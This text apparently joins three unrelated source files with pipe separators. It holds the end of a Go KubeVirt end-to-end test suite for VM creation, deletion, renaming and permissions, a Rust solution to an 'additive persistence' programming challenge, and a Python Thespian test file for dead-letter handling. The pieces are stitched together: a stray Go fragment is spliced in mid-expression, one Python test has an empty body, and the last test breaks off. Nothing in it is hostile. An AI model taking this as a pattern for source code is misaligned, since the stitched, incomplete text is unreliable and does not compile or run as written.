vm2 := newVirtualMachine(true)
renameCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_RENAME, vm2.Name, vm2.Name+"new",
"--namespace", vm2.Namespace)
Expect(renameCommand()).ToNot(Succeed())
})
It("should reject renaming a VM to the same name", func() {
renameCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_RENAME, vm1.Name, vm1.Name,
"--namespace", vm1.Namespace)
Expect(renameCommand()).ToNot(Succeed())
})
It("should reject renaming a VM with an empty name", func() {
renameCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_RENAME, vm1.Name, "",
"--namespace", vm1.Namespace)
Expect(renameCommand()).ToNot(Succeed())
})
It("should reject renaming a VM with invalid name", func() {
renameCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_RENAME, vm1.Name, "invalid name <>?:;",
"--namespace", vm1.Namespace)
Expect(renameCommand()).ToNot(Succeed())
})
It("should reject renaming a VM if the new name is taken", func() {
vm2 := newVirtualMachine(true)
renameCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_RENAME, vm1.Name, vm2.Name,
"--namespace", vm1.Namespace)
Expect(renameCommand()).ToNot(Succeed())
})
})
})
Context("[rfe_id:273]with oc/kubectl", func() {
var vmi *v1.VirtualMachineInstance
var err error
var vmJson string
var k8sClient string
var workDir string
var vmRunningRe *regexp.Regexp
BeforeEach(func() {
k8sClient = tests.GetK8sCmdClient()
tests.SkipIfNoCmd(k8sClient)
workDir, err = ioutil.TempDir("", tests.TempDirPrefix+"-")
Expect(err).ToNot(HaveOccurred())
// By default "." does not match newline: "Phase" and "Running" only match if on same line.
vmRunningRe = regexp.MustCompile("Phase.*Running")
})
AfterEach(func() {
if workDir != "" {
err = os.RemoveAll(workDir)
Expect(err).ToNot(HaveOccurred())
workDir = ""
}
})
It("[test_id:243][posneg:negative]should create VM only once", func() {
vmi = tests.NewRandomVMIWithEphemeralDisk(tests.ContainerDiskFor(tests.ContainerDiskAlpine))
vm := tests.NewRandomVirtualMachine(vmi, true)
vmJson, err = tests.GenerateVMJson(vm, workDir)
Expect(err).ToNot(HaveOccurred(), "Cannot generate VMs manifest")
By("Creating VM with DataVolumeTemplate entry with k8s client binary")
_, _, err = tests.RunCommand(k8sClient, "create", "-f", vmJson)
Expect(err).ToNot(HaveOccurred())
By("Verifying VM is created")
newVM, err := virtClient.VirtualMachine(vm.Namespace).Get(vm.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred(), "New VM was not created")
Expect(newVM.Name).To(Equal(vm.Name), "New VM was not created")
By("Creating the VM again")
_, stdErr, err := tests.RunCommand(k8sClient, "create", "-f", vmJson)
Expect(err).To(HaveOccurred())
Expect(strings.HasPrefix(stdErr, "Error from server (AlreadyExists): error when creating")).To(BeTrue(), "command should error when creating VM second time")
})
It("[test_id:299]should create VM via command line", func() {
vmi = tests.NewRandomVMIWithEphemeralDisk(tests.ContainerDiskFor(tests.ContainerDiskAlpine))
vm := tests.NewRandomVirtualMachine(vmi, true)
vmJson, err = tests.GenerateVMJson(vm, workDir)
Expect(err).ToNot(HaveOccurred(), "Cannot generate VMs manifest")
By("Creating VM using k8s client binary")
_, _, err = tests.RunCommand(k8sClient, "create", "-f", vmJson)
Expect(err).ToNot(HaveOccurred())
By("Waiting for VMI to start")
waitForVMIStart(virtClient, vmi)
By("Listing running pods")
stdout, _, err := tests.RunCommand(k8sClient, "get", "pods")
Expect(err).ToNot(HaveOccurred())
By("Ensuring pod is running")
expectedPodName := getExpectedPodName(vm)
podRunningRe, err := regexp.Compile(fmt.Sprintf("%s.*Running", expectedPodName))
Expect(err).ToNot(HaveOccurred())
Expect(podRunningRe.FindString(stdout)).ToNot(Equal(""), "Pod is not Running")
By("Checking that VM is running")
stdout, _, err = tests.RunCommand(k8sClient, "describe", "vmis", vm.GetName())
Expect(err).ToNot(HaveOccurred())
Expect(vmRunningRe.FindString(stdout)).ToNot(Equal(""), "VMI is not Running")
})
It("[test_id:264]should create and delete via command line", func() {
vmi = tests.NewRandomVMIWithEphemeralDisk(tests.ContainerDiskFor(tests.ContainerDiskAlpine))
thisVm := tests.NewRandomVirtualMachine(vmi, false)
vmJson, err = tests.GenerateVMJson(thisVm, workDir)
Expect(err).ToNot(HaveOccurred(), "Cannot generate VM's manifest")
By("Creating VM using k8s client binary")
_, _, err := tests.RunCommand(k8sClient, "create", "-f", vmJson)
Expect(err).ToNot(HaveOccurred())
By("Invoking virtctl start")
virtctl := tests.NewRepeatableVirtctlCommand(vm.COMMAND_START, "--namespace", thisVm.Namespace, thisVm.Name)
err = virtctl()
Expect(err).ToNot(HaveOccurred())
By("Waiting for VMI to start")
waitForVMIStart(virtClient, vmi)
By("Checking that VM is running")
stdout, _, err := tests.RunCommand(k8sClient, "describe", "vmis", thisVm.GetName())
Expect(err).ToNot(HaveOccurred())
Expect(vmRunningRe.FindString(stdout)).ToNot(Equal(""), "VMI is not Running")
By("Deleting VM using k8s client binary")
_, _, err = tests.RunCommand(k8sClient, "delete", "vm", thisVm.GetName())
Expect(err).ToNot(HaveOccurred())
By("Verifying the VM gets deleted")
waitForResourceDeletion(k8sClient, "vms", thisVm.GetName())
By("Verifying pod gets deleted")
expectedPodName := getExpectedPodName(thisVm)
waitForResourceDeletion(k8sClient, "pods", expectedPodName)
})
It("[test_id:232]should create same manifest twice via command line", func() {
vmi = tests.NewRandomVMIWithEphemeralDisk(tests.ContainerDiskFor(tests.ContainerDiskAlpine))
thisVm := tests.NewRandomVirtualMachine(vmi, true)
vmJson, err = tests.GenerateVMJson(thisVm, workDir)
Expect(err).ToNot(HaveOccurred(), "Cannot generate VM's manifest")
By("Creating VM using k8s client binary")
_, _, err := tests.RunCommand(k8sClient, "create", "-f", vmJson)
Expect(err).ToNot(HaveOccurred())
By("Waiting for VMI to start")
waitForVMIStart(virtClient, vmi)
By("Deleting VM using k8s client binary")
_, _, err = tests.RunCommand(k8sClient, "delete", "vm", thisVm.GetName())
Expect(err).ToNot(HaveOccurred())
By("Verifying the VM gets deleted")
waitForResourceDeletion(k8sClient, "vms", thisVm.GetName())
By("Creating same VM using k8s client binary and same manifest")
_, _, err = tests.RunCommand(k8sClient, "create", "-f", vmJson)
Expect(err).ToNot(HaveOccurred())
By("Waiting for VMI to start")
waitForVMIStart(virtClient, vmi)
})
It("[test_id:233][posneg:negative]should fail when deleting nonexistent VM", func() {
vmi := tests.NewRandomVMWithEphemeralDisk(tests.ContainerDiskFor(tests.ContainerDiskAlpine))
By("Creating VM with DataVolumeTemplate entry with k8s client binary")
_, stdErr, err := tests.RunCommand(k8sClient, "delete", "vm", vmi.Name)
Expect(err).To(HaveOccurred())
Expect(strings.HasPrefix(stdErr, "Error from server (NotFound): virtualmachines.kubevirt.io")).To(BeTrue(), "should fail when deleting non existent VM")
})
Context("as ordinary OCP user trough test service account", func() {
var testUser string
BeforeEach(func() {
testUser = "testuser-" + uuid.NewRandom().String()
})
Context("should succeed with right rights", func() {
BeforeEach(func() {
// kubectl doesn't have "adm" subcommand -- only oc does
tests.SkipIfNoCmd("oc")
By("Ensuring the cluster has new test serviceaccount")
stdOut, stdErr, err := tests.RunCommand(k8sClient, "create", "serviceaccount", testUser)
Expect(err).ToNot(HaveOccurred(), "ERR: %s", stdOut+stdErr)
By("Ensuring user has the admin rights for the test namespace project")
// This simulates the ordinary user as an admin in this project
stdOut, stdErr, err = tests.RunCommand(k8sClient, "adm", "policy", "add-role-to-user", "admin", fmt.Sprintf("system:serviceaccount:%s:%s", tests.NamespaceTestDefault, testUser))
Expect(err).ToNot(HaveOccurred(), "ERR: %s", stdOut+stdErr)
})
AfterEach(func() {
stdOut, stdErr, err := tests.RunCommand(k8sClient, "adm", "policy", "remove-role-from-user", "admin", fmt.Sprintf("system:serviceaccount:%s:%s", tests.NamespaceTestDefault, testUser))
Expect(err).ToNot(HaveOccurred(), "ERR: %s", stdOut+stdErr)
stdOut, stdErr, err = tests.RunCommand(k8sClient, "delete", "serviceaccount", testUser)
Expect(err).ToNot(HaveOccurred(), "ERR: %s", stdOut+stdErr)
})
It("[test_id:2839]should create VM via command line", func() {
vmi = tests.NewRandomVMIWithEphemeralDisk(tests.ContainerDiskFor(tests.ContainerDiskAlpine))
vm := tests.NewRandomVirtualMachine(vmi, true)
vmJson, err = tests.GenerateVMJson(vm, workDir)
Expect(err).ToNot(HaveOccurred(), "Cannot generate VMs manifest")
By("Checking VM creation permission using k8s client binary")
// It might take time for the role to propagate
Eventually(func() string {
stdOut, _, _ := tests.RunCommand(k8sClient, "auth", "can-i", "create", "vms", "--as", testUser)
return strings.TrimSpace(stdOut)
}, 10*time.Second, 1*time.Second).Should(Equal("yes"), fmt.Sprintf("test account '%s' was never granted permission to create a VM", testUser))
})
})
Context("should fail without right rights", func() {
BeforeEach(func() {
By("Ensuring the cluster has new test serviceaccount")
stdOut, stdErr, err := tests.RunCommandWithNS(tests.NamespaceTestDefault, k8sClient, "create", "serviceaccount", testUser)
Expect(err).ToNot(HaveOccurred(), "ERR: %s", stdOut+stdErr)
})
AfterEach(func() {
stdOut, stdErr, err := tests.RunCommandWithNS(tests.NamespaceTestDefault, k8sClient, "delete", "serviceaccount", testUser)
Expect(err).ToNot(HaveOccurred(), "ERR: %s", stdOut+stdErr)
})
It("[test_id:2914]should create VM via command line", func() {
vmi = tests.NewRandomVMIWithEphemeralDisk(tests.ContainerDiskFor(tests.ContainerDiskAlpine))
vm := tests.NewRandomVirtualMachine(vmi, true)
vmJson, err = tests.GenerateVMJson(vm, workDir)
Expect(err).ToNot(HaveOccurred(), "Cannot generate VMs manifest")
By("Checking VM creation permission using k8s client binary")
stdOut, _, err := tests.RunCommand(k8sClient, "auth", "can-i", "create", "vms", "--as", testUser)
// non-zero exit code
Expect(err).To(HaveOccurred())
Expect(err.Error()).To(ContainSubstring("exit status 1"))
Expect(strings.TrimSpace(stdOut)).To(Equal("no"))
})
})
})
})
Context("VM rename", func() {
var (
vm *v1.VirtualMachine
cli kubecli.VirtualMachineInterface
)
BeforeEach(func() {
vm = tests.NewRandomVMWithEphemeralDisk(tests.ContainerDiskFor(tests.ContainerDiskCirros))
cli = virtClient.VirtualMachine(tests.NamespaceTestDefault)
})
Context("VM creation", func() {
It("should fail if a VM is created with a rename request", func() {
vm.Status.StateChangeRequests = []v1.VirtualMachineStateChangeRequest{
{
Action: v1.RenameRequest,
Data: map[string]string{
"newName": "something-new",
},
},
}
_, err := cli.Create(vm)
Expect(err).To(HaveOccurred())
Expect(err.Error()).To(ContainSubstring("Creating a VM with a rename request is not allowed"))
})
})
Context("VM update", func() {
var (
vm1 *v1.VirtualMachine
)
BeforeEach(func() {
vm1 = tests.NewRandomVMWithEphemeralDisk(tests.ContainerDiskFor(tests.ContainerDiskCirros))
cli.Create(vm1)
})
It("should fail if the new name is already taken", func() {
vm2 := tests.NewRandomVMWithEphemeralDisk(tests.ContainerDiskFor(tests.ContainerDiskCirros))
cli.Create(vm2)
err := cli.Rename(vm1.Name, &v1.RenameOptions{NewName: vm2.Name})
Expect(err).To(HaveOccurred())
Expect(err.Error()).To(ContainSubstring("name already exists"))
})
It("should fail if the new name is empty", func() {
err := cli.Rename(vm1.Name, &v1.RenameOptions{})
Expect(err).To(HaveOccurred())
Expect(err.Error()).To(ContainSubstring("Please provide a new name for the VM"))
})
It("should fail if the new name is invalid", func() {
err := cli.Rename(vm1.Name, &v1.RenameOptions{NewName: "invalid name <>?:;"})
Expect(err).To(HaveOccurred())
Expect(err.Error()).To(ContainSubstring("The VM's new name is not valid"))
})
It("should fail if the new name is identical to the current name", func() {
err := cli.Rename(vm1.Name, &v1.RenameOptions{NewName: vm1.Name})
Expect(err).To(HaveOccurred())
Expect(err.Error()).To(ContainSubstring("identical"))
})
It("should fail if the VM is running", func() {
err := cli.Start(vm1.Name)
Expect(err).ToNot(HaveOccurred())
err = cli.Rename(vm1.Name, &v1.RenameOptions{NewName: vm1.Name + "new"})
Expect(err).To(HaveOccurred())
Expect(err.Error()).To(ContainSubstring("running"))
})
It("should succeed", func() {
err := cli.Rename(vm1.Name, &v1.RenameOptions{NewName: vm1.Name + "new"})
Expect(err).ToNot(HaveOccurred())
Eventually(func() error {
_, err := cli.Get(vm1.Name+"new", &v12.GetOptions{})
return err
}).Should(BeNil())
_, err = cli.Get(vm1.Name, &v12.GetOptions{})
Expect(err).To(HaveOccurred())
Expect(err.Error()).To(ContainSubstring("not found"))
})
})
})
})
func getExpectedPodName(vm *v1.VirtualMachine) string {
maxNameLength := 63
podNamePrefix := "virt-launcher-"
podGeneratedSuffixLen := 5
charCountFromName := maxNameLength - len(podNamePrefix) - podGeneratedSuffixLen
expectedPodName := fmt.Sprintf(fmt.Sprintf("virt-launcher-%%.%ds", charCountFromName), vm.GetName())
return expectedPodName
}
func NewRandomVirtualMachineWithRunStrategy(vmi *v1.VirtualMachineInstance, runStrategy v1.VirtualMachineRunStrategy) *v1.VirtualMachine {
vm := tests.NewRandomVirtualMachine(vmi, false)
vm.Spec.Running = nil
vm.Spec.RunStrategy = &runStrategy
return vm
}
func waitForVMIStart(virtClient kubecli.KubevirtClient, vmi *v1.VirtualMachineInstance) {
Eventually(func() v1.VirtualMachineInstancePhase {
newVMI, err := virtClient.VirtualMachineInstance(vmi.Namespace).Get(vmi.GetName(), &v12.GetOptions{})
if err != nil {
if !errors.IsNotFound(err) {
Expect(err).ToNot(HaveOccurred())
}
return v1.Unknown
}
return newVMI.Status.Phase
}, 120*time.Second, 1*time.Second).Should(Equal(v1.Running), "New VMI was not created")
}
func waitForNewVMI(virtClient kubecli.KubevirtClient, vmi *v1.VirtualMachineInstance) {
Eventually(func() bool {
newVMI, err := virtClient.VirtualMachineInstance(vmi.Namespace).Get(vmi.GetName(), &v12.GetOptions{})
if err != nil {
if !errors.IsNotFound(err) {
Expect(err).ToNot(HaveOccurred())
}
return false
}
return (newVMI.Status.Phase == v1.Scheduling) || (newVMI.Status.Phase == v1.Running)
}, 120*time.Second, 1*time.Second).Should(BeTrue(), "New VMI was not created")
}
func waitForResourceDeletion(k8sClient string, resourceType string, resourceName string) {
Eventually(func() bool {
stdout, _, err := tests.RunCommand(k8sClient, "get", resourceType)
Expect(err).ToNot(HaveOccurred())
return strings.Contains(stdout, resourceName)
}, 120*time.Second, 1*time.Second).Should(BeFalse(), "VM was not deleted")
} | Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready |
lib.rs | use core::{slog, Challenge, Difficulty, Error, Info, Logger};
use smallvec::SmallVec;
use std::iter::Sum;
pub const TITLE: &str = "Additive Persistence";
pub const LINK: &str = "https://www.reddit.com/r/dailyprogrammer/comments/akv6z4/20190128_challenge_374_easy_additive_persistence/?utm_source=share&utm_medium=web2x";
pub const DESCRIPTION: &str = "# Description
Inspired by [this tweet](https://twitter.com/fermatslibrary/status/1089883307473543170), today's challenge is to calculate the [*additive persistence*](http://mathworld.wolfram.com/AdditivePersistence.html) of a number, defined as how many loops you have to do summing its digits until you get a single digit number. Take an integer *N*:
1. Add its digits
2. Repeat until the result has 1 digit
The total number of iterations is the additive persistence of *N*.
Your challenge today is to implement a function that calculates the additive persistence of a number.
# Examples
```
13 -> 1
1234 -> 2
9876 -> 2
199 -> 3
```
# Bonus
The really easy solution manipulates the input to convert the number to a string and iterate over it. Try it without making the number a strong, decomposing it into digits while keeping it a number.
On some platforms and languages, if you try and find ever larger persistence values you'll quickly learn about your platform's big integer interfaces (e.g. 64 bit numbers).";
#[derive(Debug, Clone, PartialEq)]
pub struct Easy374 {
info: Info,
}
impl Default for Easy374 {
fn default() -> Easy374 { | Easy374 {
info: Info {
title: TITLE.into(),
link: LINK.into(),
description: DESCRIPTION.into(),
number: 374,
difficulty: Difficulty::Easy,
},
}
}
}
impl Challenge for Easy374 {
fn info(&self) -> &Info {
&self.info
}
fn execute(&self, logger: &Logger) -> Result<(), Error> {
let numbers: Vec<u64> = vec![
13,
1234,
9876,
0,
10,
19,
199,
1234567890,
12345678901234567890,
];
for number in numbers {
let ap = additive_persistence(number);
slog::info!(logger, ""; "number" => number, "additive-persistence" => ap);
}
Ok(())
}
}
/// Calculate a number's *additive persistence*.
pub fn additive_persistence<N: Number>(n: N) -> u32 {
let mut count = 0;
let mut n = n;
while n.two_or_more_digits() {
n = sum_digits(n);
count += 1;
}
count
}
fn sum_digits<N: Number>(n: N) -> N {
digits(n).map(N::from_u8).sum()
}
/// A digit buffer.
pub type Buffer = SmallVec<[u8; 8]>;
/// Get an iterator over the digits in a number.
pub fn digits<N: Number>(n: N) -> impl Iterator<Item = u8> {
let mut buffer = Buffer::new();
n.digits_rec(&mut buffer);
buffer.into_iter()
}
/// A generic number for the purposes of calculating *Additive Persistence*.
pub trait Number: Sum {
/// Push the digits of this number onto the buffer.
fn digits_rec(&self, buffer: &mut Buffer);
/// Does this number have 2 or more digits?
fn two_or_more_digits(&self) -> bool;
fn from_u8(n: u8) -> Self;
}
macro_rules! impl_number {
($ty:ty) => {
impl $crate::Number for $ty {
#[allow(unused_comparisons)]
fn digits_rec(&self, buffer: &mut Buffer) {
debug_assert!(*self >= 0,
"It doesn't make sense to find the digits in a negative number");
if *self >= 10 {
(*self/10).digits_rec(buffer);
}
let digit = *self % 10;
buffer.push(digit as u8);
}
fn two_or_more_digits(&self) -> bool {
*self >= 10
}
fn from_u8(n: u8) -> Self {
n as $ty
}
}
};
( $( $ty:ty ),*) => {
$(
impl_number!($ty);
)*
}
}
impl_number!(u8, u16, u32, u64);
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn example_values() {
let inputs = vec![(13_u32, 1), (1234, 2), (9876, 2), (199, 3)];
for (input, should_be) in inputs {
let got = additive_persistence(input);
assert_eq!(got, should_be, "for {}", input);
}
}
#[test]
fn get_number_digits() {
let inputs: Vec<(u32, &[u8])> = vec![
(0, &[0]),
(10, &[1, 0]),
(111, &[1, 1, 1]),
(101010, &[1, 0, 1, 0, 1, 0]),
];
for (input, should_be) in inputs {
let got: Vec<_> = digits(input).collect();
assert_eq!(got, should_be);
}
}
} | |
test_deadLettering.py | """Verify DeadLetter handling behavior.
Current behavior is that an Actor may register for DeadLetter
handling. If it is registered, any message sent to an Actor that is
no longer present will be redirected to the register DeadLetter actor
(in its original form).
On exit of the DeadLetter handling Actor, the system reverts to the
default where dead letters are discarded.
If another Actor registers for DeadLetter handling, the new
registration will supercede the old registration. The original
handler is not aware of this, and will no longer receive DeadLetters,
even if the new handler de-registers.
Dead letters are handled by the local ActorSystem. Even if the parent
of an Actor is located in a separate system, the DeadLetter handler is
in the local System.
"""
import time
from thespian.actors import *
from thespian.test import *
from datetime import timedelta
ASK_WAIT = timedelta(seconds=15)
dead_routing_wait = lambda: inTestDelay(timedelta(milliseconds=125))
actor_exit_wait = lambda: inTestDelay(timedelta(milliseconds=50))
actor_create_wait = lambda: inTestDelay(timedelta(milliseconds=750))
actor_do_stuff_wait = lambda: inTestDelay(timedelta(milliseconds=500))
class DLHandler(Actor):
def receiveMessage(self, msg, sender):
if msg == 'Start':
self.handleDeadLetters()
elif msg == 'Stop':
self.handleDeadLetters(False)
elif msg == 'Count':
self.send(sender, getattr(self, 'numDeadLetters', 0))
elif isinstance(msg, ActorExitRequest):
pass
else:
# got a dead letter
self.numDeadLetters = getattr(self, 'numDeadLetters', 0) + 1
class DLParent(Actor):
def receiveMessage(self, msg, sender):
if not isinstance(msg, ActorSystemMessage): # or isinstance(msg, DeadEnvelope):
if not getattr(self, 'dlchild', None):
self.dlchild = self.createActor(DLHandler)
if self.dlchild == sender:
# Upward
self.send(self.lastSender, msg)
else:
# Downward
self.lastSender = sender
if msg == 'exit please':
self.send(self.dlchild, ActorExitRequest())
else:
self.send(self.dlchild, msg)
# UDP does not provide the ability to validate delivery of messages
# (outside of higher-level validation handshakes), so this system base
# cannot support Dead Lettering (as documented).
class TestFuncDeadLettering(object):
def checkNewDLCount(self, asys, handlerAddress, oldCount):
#asys = ActorSystem()
cnt = asys.ask(handlerAddress, 'Count', ASK_WAIT)
retries = 30
while cnt <= oldCount and retries:
retries -= 1
dead_routing_wait()
cnt = asys.ask(handlerAddress, 'Count', ASK_WAIT)
assert cnt > oldCount
return cnt
def test01_registerDeadLetter(self, asys, run_unstable_tests):
unstable_test(run_unstable_tests, asys, 'multiprocUDPBase')
handler = asys.createActor(DLHandler)
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler, 'Start')
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler, 'Stop')
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
def test11_registerDeadLetterSubActor(self, asys, run_unstable_tests):
|
def test02_GetDeadLetter(self, asys, run_unstable_tests):
unstable_test(run_unstable_tests, asys, 'multiprocUDPBase')
handler = asys.createActor(DLHandler)
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler, 'Start')
cnt = self.checkNewDLCount(asys, handler, -1)
pawn = asys.createActor(DLHandler)
asys.tell(pawn, ActorExitRequest())
actor_exit_wait()
asys.tell(pawn, 'hello')
cnt = self.checkNewDLCount(asys, handler, cnt)
asys.tell(pawn, 'hi')
cnt = self.checkNewDLCount(asys, handler, cnt)
asys.tell(handler, 'Stop')
actor_exit_wait()
asys.tell(pawn, 'another')
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(pawn, 'and another')
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
def test12_GetDeadLetterSubActor(self, asys, run_unstable_tests):
unstable_test(run_unstable_tests, asys, 'multiprocUDPBase')
handler = asys.createActor(DLParent)
r = asys.ask(handler, 'Count', ASK_WAIT)
assert 0 == r
asys.tell(handler, 'Start')
cnt = self.checkNewDLCount(asys, handler, -1)
pawn = asys.createActor(DLParent)
asys.tell(pawn, 'exit please')
actor_create_wait()
asys.tell(pawn, 'hello')
cnt = self.checkNewDLCount(asys, handler, cnt)
asys.tell(pawn, 'hi')
cnt = self.checkNewDLCount(asys, handler, cnt)
asys.tell(handler, 'Stop')
actor_exit_wait()
asys.tell(pawn, 'another')
r = asys.ask(handler, 'Count', ASK_WAIT)
assert cnt == r
asys.tell(pawn, 'and another')
r = asys.ask(handler, 'Count', ASK_WAIT)
assert cnt == r
def test03_DLRegisterOnlyOnce(self, asys, run_unstable_tests):
unstable_test(run_unstable_tests, asys, 'multiprocUDPBase')
handler = asys.createActor(DLHandler)
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler, 'Start')
cnt = self.checkNewDLCount(asys, handler, -1)
# Create another actor and shut it down so we can capture its dead letters
pawn = asys.createActor(DLHandler)
asys.tell(pawn, ActorExitRequest())
actor_do_stuff_wait()
# Send a couple of messages and verify they are each passed to the dead letter handler
asys.tell(pawn, 'hello')
cnt = self.checkNewDLCount(asys, handler, cnt)
asys.tell(pawn, 'hi')
cnt = self.checkNewDLCount(asys, handler, cnt)
# Another start has no effect; remains the dead letter handler.
asys.tell(handler, 'Start')
actor_do_stuff_wait()
# Send another couple of messages to the dead actor and verify dead letter receipt.
asys.tell(pawn, 'another')
cnt = self.checkNewDLCount(asys, handler, cnt)
asys.tell(pawn, 'and another')
cnt = self.checkNewDLCount(asys, handler, cnt)
def test13_DLRegisterOnlyOnce(self, asys, run_unstable_tests):
unstable_test(run_unstable_tests, asys, 'multiprocUDPBase')
handler = asys.createActor(DLParent)
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler, 'Start')
cnt = self.checkNewDLCount(asys, handler, -1)
# Create another actor and shut it down so we can capture its dead letters
pawn = asys.createActor(DLParent)
asys.tell(pawn, ActorExitRequest())
actor_exit_wait()
# Send a couple of messages and verify they are each passed to the dead letter handler
asys.tell(pawn, 'hello')
cnt = self.checkNewDLCount(asys, handler, cnt)
asys.tell(pawn, 'hi')
cnt = self.checkNewDLCount(asys, handler, cnt)
# Another start has no effect; remains the dead letter handler.
asys.tell(handler, 'Start')
actor_do_stuff_wait()
# Send another couple of messages to the dead actor and verify dead letter receipt.
asys.tell(pawn, 'another')
cnt = self.checkNewDLCount(asys, handler, cnt)
asys.tell(pawn, 'and another')
cnt = self.checkNewDLCount(asys, handler, cnt)
def test04_DLMultipleHandlers(self, asys, run_unstable_tests):
unstable_test(run_unstable_tests, asys, 'multiprocUDPBase')
handler = asys.createActor(DLHandler)
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler, 'Start')
cnt = self.checkNewDLCount(asys, handler, -1)
pawn = asys.createActor(DLHandler)
asys.tell(pawn, ActorExitRequest())
actor_exit_wait()
asys.tell(pawn, 'hello')
cnt = self.checkNewDLCount(asys, handler, cnt)
asys.tell(pawn, 'hi')
cnt = self.checkNewDLCount(asys, handler, cnt)
handler2 = asys.createActor(DLHandler)
asys.tell(handler2, 'Start')
actor_do_stuff_wait()
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
assert 0 == asys.ask(handler2, 'Count', ASK_WAIT)
cnt2 = self.checkNewDLCount(asys, handler2, -1)
asys.tell(pawn, 'another')
cnt2 = self.checkNewDLCount(asys, handler2, cnt2)
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(pawn, 'and another')
cnt2 = self.checkNewDLCount(asys, handler2, cnt2)
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler, 'Stop') # no effect
actor_do_stuff_wait()
asys.tell(pawn, 'more messages')
cnt2 = self.checkNewDLCount(asys, handler2, cnt2)
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(pawn, 'more messages again')
cnt2 = self.checkNewDLCount(asys, handler2, cnt2)
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler2, 'Stop')
actor_do_stuff_wait()
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
assert cnt2 == asys.ask(handler2, 'Count', ASK_WAIT)
asys.tell(pawn, 'more messages repeated')
actor_do_stuff_wait()
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
assert cnt2 == asys.ask(handler2, 'Count', ASK_WAIT)
asys.tell(pawn, 'more messages again repeated')
actor_do_stuff_wait()
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
assert cnt2 == asys.ask(handler2, 'Count', ASK_WAIT)
asys.tell(handler, 'Start')
actor_do_stuff_wait()
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
assert cnt2 == asys.ask(handler2, 'Count', ASK_WAIT)
asys.tell(pawn, 'more messages repeated reprised')
cnt = self.checkNewDLCount(asys, handler, cnt)
assert cnt2 == asys.ask(handler2, 'Count', ASK_WAIT)
asys.tell(pawn, 'more messages again repeated reprised')
cnt = self.checkNewDLCount(asys, handler, cnt)
assert cnt2 == asys.ask(handler2, 'Count', ASK_WAIT)
def test14_DLMultipleHandlers(self, asys, run_unstable_tests):
unstable_test(run_unstable_tests, asys, 'multiprocUDPBase')
handler = asys.createActor(DLParent)
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler, 'Start')
cnt = self.checkNewDLCount(asys, handler, -1)
pawn = asys.createActor(DLParent)
asys.tell(pawn, ActorExitRequest())
actor_exit_wait()
asys.tell(pawn, 'hello')
cnt = self.checkNewDLCount(asys, handler, cnt)
asys.tell(pawn, 'hi')
cnt = self.checkNewDLCount(asys, handler, cnt)
handler2 = asys.createActor(DLParent)
asys.tell(handler2, 'Start')
actor_do_stuff_wait()
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
assert 0 == asys.ask(handler2, 'Count', ASK_WAIT)
cnt2 = self.checkNewDLCount(asys, handler2, -1)
asys.tell(pawn, 'another')
cnt2 = self.checkNewDLCount(asys, handler2, cnt2)
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(pawn, 'and another')
cnt2 = self.checkNewDLCount(asys, handler2, cnt2)
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler, 'Stop') # no effect
actor_do_stuff_wait()
asys.tell(pawn, 'more messages')
cnt2 = self.checkNewDLCount(asys, handler2, cnt2)
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(pawn, 'more messages again')
cnt2 = self.checkNewDLCount(asys, handler2, cnt2)
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler2, 'Stop')
actor_do_stuff_wait()
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
assert cnt2 == asys.ask(handler2, 'Count', ASK_WAIT)
asys.tell(pawn, 'more messages repeated')
actor_do_stuff_wait()
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
assert cnt2 == asys.ask(handler2, 'Count', ASK_WAIT)
asys.tell(pawn, 'more messages again repeated')
actor_do_stuff_wait()
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
assert cnt2 == asys.ask(handler2, 'Count', ASK_WAIT)
asys.tell(handler, 'Start')
actor_do_stuff_wait()
assert cnt == asys.ask(handler, 'Count', ASK_WAIT)
assert cnt2 == asys.ask(handler2, 'Count', ASK_WAIT)
asys.tell(pawn, 'more messages repeated reprised')
cnt = self.checkNewDLCount(asys, handler, cnt)
assert cnt2 == asys.ask(handler2, 'Count', ASK_WAIT)
asys.tell(pawn, 'more messages again repeated reprised')
cnt = self.checkNewDLCount(asys, handler, cnt)
assert cnt2 == asys.ask(handler2, 'Count', ASK_WAIT)
def test05_DLAutoRemoval(self, asys, run_unstable_tests):
unstable_test(run_unstable_tests, asys, 'multiprocUDPBase')
handler = asys.createActor(DLHandler)
assert 0 == asys.ask(handler, 'Count', ASK_WAIT)
asys.tell(handler, 'Start')
handler2 = asys.createActor(DLHandler)
